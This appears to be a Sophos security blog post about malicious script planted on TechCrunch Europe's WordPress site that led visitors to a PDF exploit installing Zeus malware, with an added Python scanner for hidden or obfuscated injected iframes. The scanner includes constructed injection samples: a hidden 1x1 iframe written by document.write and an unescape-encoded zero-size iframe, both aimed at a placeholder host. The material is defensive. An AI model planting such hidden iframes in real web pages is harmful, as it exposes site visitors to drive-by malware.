Updated: The European website of TechCrunch (eu.techcrunch.com), one of the world’s most popular blogs, appears to have fallen victim to hackers, who have planted a malicious script on the site designed to infect unsuspecting visitors.
TechCrunch Europe posted a message on its Twitter feed earlier today describing warnings about malware being distributed via the site as “annoying”. Perhaps a rather unusual turn of phrase, which might suggest to observers that the warnings were erroneous rather than the result of a serious security problem.
A closer examination of TechCrunch Europe’s site reveals that the offending code, a malicious iframe, is found in a JavaScript file used by the site as part of its WordPress infrastructure. The iframe loads a page that attempts to serve up a malicious PDF file, which exploits a vulnerability to install a nasty infection from the ZBot (also known as Zeus) malware family on the visitor’s computer.
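Site administrators who want to check their own WordPress install for this class of injection need something that walks the JavaScript files and flags iframes that are hidden, tiny, written in via document.write, or only visible after decoding. The script below is an added example for this post, not code from SophosLabs or TechCrunch; the three sample scripts in it are constructed and are not the real payload found on TechCrunch Europe, and the host example.invalid is a placeholder.

```python
import re
import urllib.parse
from dataclasses import dataclass
from pathlib import Path

# Patterns for the injection style described above: an <iframe> written into the
# page from a JavaScript file, usually made invisible so visitors notice nothing.
IFRAME_TAG = re.compile(r"<\s*iframe\b[^>]*>", re.IGNORECASE)
SIZE_ATTR = re.compile(r"\b(width|height)\s*=\s*['\"]?(\d+)", re.IGNORECASE)
HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
DOC_WRITE = re.compile(r"document\.write(?:ln)?\s*\(")
FROM_CHAR_CODE = re.compile(r"String\.fromCharCode\s*\(([\d\s,]+)\)")
UNESCAPE_CALL = re.compile(r"unescape\s*\(\s*(['\"])(.*?)\1\s*\)", re.DOTALL)


def deobfuscate(js: str) -> str:
    """Undo two cheap encodings injected scripts use to hide the literal '<iframe':
    String.fromCharCode(60,105,...) and unescape('%3Ciframe...')."""
    def decode_charcodes(m):
        return "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip())
    js = FROM_CHAR_CODE.sub(decode_charcodes, js)
    js = UNESCAPE_CALL.sub(lambda m: urllib.parse.unquote(m.group(2)), js)
    return js


@dataclass
class Finding:
    offset: int   # position of the tag in the decoded source
    tag: str      # the <iframe ...> opening tag
    reasons: list # why it looks injected rather than a normal embed


def scan_js(js: str) -> list:
    """Return a Finding for each iframe that looks injected. A plain, visible
    iframe (a video embed, say) produces no finding."""
    decoded = deobfuscate(js)
    findings = []
    for m in IFRAME_TAG.finditer(decoded):
        tag = m.group(0)
        reasons = []
        sizes = [int(v) for _, v in SIZE_ATTR.findall(tag)]
        if sizes and max(sizes) <= 2:
            reasons.append("tiny dimensions")
        if HIDDEN_STYLE.search(tag):
            reasons.append("hidden via CSS")
        # Look back a short way for a document.write() wrapping the tag.
        if DOC_WRITE.search(decoded[max(0, m.start() - 120):m.start()]):
            reasons.append("written by document.write")
        if tag not in js:
            reasons.append("only visible after decoding")
        if reasons:
            findings.append(Finding(m.start(), tag, reasons))
    return findings


def scan_tree(root: str, suffix: str = ".js"):
    """Walk a WordPress install (wp-content, wp-includes, ...) and yield
    (path, findings) for every script that contains a suspicious iframe."""
    for path in sorted(Path(root).rglob("*" + suffix)):
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        hits = scan_js(text)
        if hits:
            yield path, hits


# Constructed samples (assumed content, not the real TechCrunch Europe payload).
CLEAN_JS = """
jQuery(function($){
  $('#video').html('<iframe src="https://www.youtube.com/embed/VIDEO_ID" width="560" height="315"></iframe>');
});
"""
INJECTED_JS = """
jQuery(function($){ $('#menu').show(); });
document.write('<iframe src="http://example.invalid/in.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>');
"""
OBFUSCATED_JS = """
document.write(unescape('%3Ciframe src=%22http://example.invalid/x.php%22 width=0 height=0 style=%22display:none%22%3E%3C/iframe%3E'));
"""

if __name__ == "__main__":
    for name, src in [("clean", CLEAN_JS), ("injected", INJECTED_JS), ("obfuscated", OBFUSCATED_JS)]:
        for f in scan_js(src):
            print(f"{name}: offset {f.offset}: {', '.join(f.reasons)}")
```

Run it against a real install with `for path, hits in scan_tree("/var/www/html"): ...`; the clean sample yields nothing, while the two injected samples are flagged on several counts at once. Treat any hit as a lead to diff the file against a pristine copy of the theme or plugin rather than as a verdict, since legitimate tracking pixels can also be tiny and hidden.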
Sophos customers who have already switched on “Live Protection” in Sophos Endpoint Security and Data Protection version 9.5 are already protected, benefiting from our very latest in-the-cloud technology to defend efficiently and proactively against new threats like this. There’s a lesson here: if you are using Sophos version 9.5, turn on Live Protection! It’s worth it.
Users of some web browsers may also be protected – for instance, here’s a screenshot of Firefox intercepting one of the infected pages on TechCrunch Europe.
The problem appears to have been present on TechCrunch Europe’s website for some time, and yet no obvious warning to visitors has been posted on the site, nor, seemingly, has there been any attempt to remove the malicious script or block users from visiting the infected pages.
One has to wonder whether malicious hackers are taking advantage of the Labor Day holiday in North America today, which may mean that fewer of TechCrunch’s support team (who might be able to fix this problem) are available.
SophosLabs have analysed the malware being spread via the infection, which we detect as Troj/Zbot-YP.
Update: Andy Brett, an engineer who works for TechCrunch in California, contacted me at about 10pm UK time to tell me that the malicious JavaScript code has been removed from the site, although it may take some time before browsers which rely on third-party blacklists stop warning about pages on the site.
Ideally TechCrunch will post a message on its site (on the TechCrunch Europe site, at least) informing users about the incident and advising that they check their PCs with an up-to-date anti-virus. I don’t see any message to that effect yet on that site – but I’m hopeful.
Yes, some firms are embarrassed when their websites become infected – and it’s not the kind of event that we would wish upon anyone. But let’s not forget that TechCrunch is the victim of a criminal act, and although in an ideal world their site would not have been compromised in this way they are not – ultimately – the ones to blame for the wrongdoing.
What they can do, as a responsible member of the internet community, is advise anyone who might have visited the site while it was infected to double-check their computer systems. That’s the kind of behaviour that we would expect of any website that suffered a security problem, and is, indeed, the kind of behaviour that technology media websites like TechCrunch would expect from others too.
Hat-tip: Thanks to @theharmonyguy who first made me aware of this issue.